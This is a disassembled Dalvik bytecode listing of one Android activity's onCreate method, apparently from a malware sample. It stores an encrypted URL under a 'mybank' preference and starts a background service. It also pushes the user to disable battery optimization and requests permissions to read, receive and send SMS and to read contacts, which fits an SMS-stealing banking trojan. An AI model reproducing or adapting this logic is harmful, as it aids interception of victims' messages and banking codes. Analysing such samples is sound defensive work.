# Lkk/chunyu/MainActivity0530;->onCreate(Landroid/os/Bundle;)V [access_flags=protected]
#
# Parameters:
# - local registers: v0...v10
# - v11:android.os.Bundle
#
# - return:void

onCreate-BB@0x0 : [ onCreate-BB@0x1c ]
	0       (00000000) const/4              v9, 3
	1       (00000002) const/4              v8, 1
	2       (00000004) invoke-super         v10, v11, Landroid/support/v7/app/AppCompatActivity;->onCreate(Landroid/os/Bundle;)V
	3       (0000000a) new-instance         v4, Lkk/util/SPUtil;
	4       (0000000e) const-string         v5, 'mybank'
	5       (00000012) invoke-direct        v4, v10, v5, Lkk/util/SPUtil;-><init>(Landroid/content/Context; Ljava/lang/String;)V
	6       (00000018) iput-object          v4, v10, Lkk/chunyu/MainActivity0530;->sp Lkk/util/SPUtil;

onCreate-BB@0x1c : [ onCreate-BB@0x44 ]
	7       (0000001c) iget-object          v4, v10, Lkk/chunyu/MainActivity0530;->sp Lkk/util/SPUtil;
	8       (00000020) const-string         v5, 'URL'
	9       (00000024) new-instance         v6, Lkk/util/JUtils;
	10      (00000028) const-string         v7, 'TEST'
	11      (0000002c) invoke-direct        v6, v7, Lkk/util/JUtils;-><init>(Ljava/lang/String;)V
	12      (00000032) const-string         v7, '77dbaa7eb4981e3581dee237b107d809c382ba860ae76a00b3082c765fcbe70b'
	13      (00000036) invoke-virtual       v6, v7, Lkk/util/JUtils;->decrypt(Ljava/lang/String;)Ljava/lang/String;
	14      (0000003c) move-result-object   v6
	15      (0000003e) invoke-virtual       v4, v5, v6, Lkk/util/SPUtil;->setValue(Ljava/lang/String; Ljava/lang/String;)V
	1c:43
	(Ljava/lang/Exception; -> 13e onCreate-BB@0x13e)

onCreate-BB@0x44 : [ onCreate-BB@0x64 onCreate-BB@0x14a ]
	16      (00000044) new-instance         v4, Landroid/content/Intent;
	17      (00000048) const-class          v5, Lkk/service/FUK;
	18      (0000004c) invoke-direct        v4, v10, v5, Landroid/content/Intent;-><init>(Landroid/content/Context; Ljava/lang/Class;)V
	19      (00000052) invoke-virtual       v10, v4, Lkk/chunyu/MainActivity0530;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
	20      (00000058) invoke-virtual       v10, v10, Lkk/chunyu/MainActivity0530;->isNetworkAvailable(Landroid/app/Activity;)Z
	21      (0000005e) move-result          v4
	22      (00000060) if-eqz               v4, +75

onCreate-BB@0x64 : [ onCreate-BB@0x76 ]
	23      (00000064) const                v4, 2130968629 # [1.754591704113179e+38]
	24      (0000006a) invoke-virtual       v10, v4, Lkk/chunyu/MainActivity0530;->setContentView(I)V
	25      (00000070) invoke-direct        v10, Lkk/chunyu/MainActivity0530;->initViews()V

onCreate-BB@0x76 : [ onCreate-BB@0x82 onCreate-BB@0xf6 ]
	26      (00000076) sget                 v4, Landroid/os/Build$VERSION;->SDK_INT I
	27      (0000007a) const/16             v5, 22
	28      (0000007e) if-le                v4, v5, +3c

onCreate-BB@0x82 : [ onCreate-BB@0xa6 onCreate-BB@0xf6 ]
	29      (00000082) const-string         v4, 'power'
	30      (00000086) invoke-virtual       v10, v4, Lkk/chunyu/MainActivity0530;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
	31      (0000008c) move-result-object   v3
	32      (0000008e) check-cast           v3, Landroid/os/PowerManager;
	33      (00000092) invoke-virtual       v10, Lkk/chunyu/MainActivity0530;->getPackageName()Ljava/lang/String;
	34      (00000098) move-result-object   v4
	35      (0000009a) invoke-virtual       v3, v4, Landroid/os/PowerManager;->isIgnoringBatteryOptimizations(Ljava/lang/String;)Z
	36      (000000a0) move-result          v1
	37      (000000a2) if-nez               v1, +2a

onCreate-BB@0xa6 : [ onCreate-BB@0xf6 ]
	38      (000000a6) new-instance         v2, Landroid/content/Intent;
	39      (000000aa) const-string         v4, 'android.settings.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS'
	40      (000000ae) invoke-direct        v2, v4, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
	41      (000000b4) new-instance         v4, Ljava/lang/StringBuilder;
	42      (000000b8) invoke-direct        v4, Ljava/lang/StringBuilder;-><init>()V
	43      (000000be) const-string         v5, 'package:'
	44      (000000c2) invoke-virtual       v4, v5, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	45      (000000c8) move-result-object   v4
	46      (000000ca) invoke-virtual       v10, Lkk/chunyu/MainActivity0530;->getPackageName()Ljava/lang/String;
	47      (000000d0) move-result-object   v5
	48      (000000d2) invoke-virtual       v4, v5, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	49      (000000d8) move-result-object   v4
	50      (000000da) invoke-virtual       v4, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	51      (000000e0) move-result-object   v4
	52      (000000e2) invoke-static        v4, Landroid/net/Uri;->parse(Ljava/lang/String;)Landroid/net/Uri;
	53      (000000e8) move-result-object   v4
	54      (000000ea) invoke-virtual       v2, v4, Landroid/content/Intent;->setData(Landroid/net/Uri;)Landroid/content/Intent;
	55      (000000f0) invoke-virtual       v10, v2, Lkk/chunyu/MainActivity0530;->startActivity(Landroid/content/Intent;)V

onCreate-BB@0xf6 : [ onCreate-BB@0x102 onCreate-BB@0x13c ]
	56      (000000f6) sget                 v4, Landroid/os/Build$VERSION;->SDK_INT I
	57      (000000fa) const/16             v5, 23
	58      (000000fe) if-lt                v4, v5, +1f

onCreate-BB@0x102 : [ onCreate-BB@0x13c ]
	59      (00000102) const/4              v4, 5
	60      (00000104) new-array            v4, v4, [Ljava/lang/String;
	61      (00000108) const/4              v5, 0
	62      (0000010a) const-string         v6, 'android.permission.READ_PHONE_STATE'
	63      (0000010e) aput-object          v6, v4, v5
	64      (00000112) const-string         v5, 'android.permission.RECEIVE_SMS'
	65      (00000116) aput-object          v5, v4, v8
	66      (0000011a) const/4              v5, 2
	67      (0000011c) const-string         v6, 'android.permission.READ_SMS'
	68      (00000120) aput-object          v6, v4, v5
	69      (00000124) const-string         v5, 'android.permission.SEND_SMS'
	70      (00000128) aput-object          v5, v4, v9
	71      (0000012c) const/4              v5, 4
	72      (0000012e) const-string         v6, 'android.permission.READ_CONTACTS'
	73      (00000132) aput-object          v6, v4, v5
	74      (00000136) invoke-static        v10, v4, v9, Landroid/support/v4/app/ActivityCompat;->requestPermissions(Landroid/app/Activity; [Ljava/lang/String; I)V

onCreate-BB@0x13c : 
	75      (0000013c) return-void          

onCreate-BB@0x13e : [ onCreate-BB@0x44 ]
	76      (0000013e) move-exception       v0
	77      (00000140) invoke-virtual       v0, Ljava/lang/Exception;->printStackTrace()V
	78      (00000146) goto/16              -81

onCreate-BB@0x14a : [ onCreate-BB@0x76 ]
	79      (0000014a) invoke-virtual       v10, Lkk/chunyu/MainActivity0530;->getApplicationContext()Landroid/content/Context;
	80      (00000150) move-result-object   v4
	81      (00000152) const-string         v5, '当前没有可用网络,请打开网络！'
	82      (00000156) invoke-static        v4, v5, v8, Landroid/widget/Toast;->makeText(Landroid/content/Context; Ljava/lang/CharSequence; I)Landroid/widget/Toast;
	83      (0000015c) move-result-object   v4
	84      (0000015e) invoke-virtual       v4, Landroid/widget/Toast;->show()V
	85      (00000164) invoke-virtual       v10, Lkk/chunyu/MainActivity0530;->finish()V
	86      (0000016a) goto                 -7a

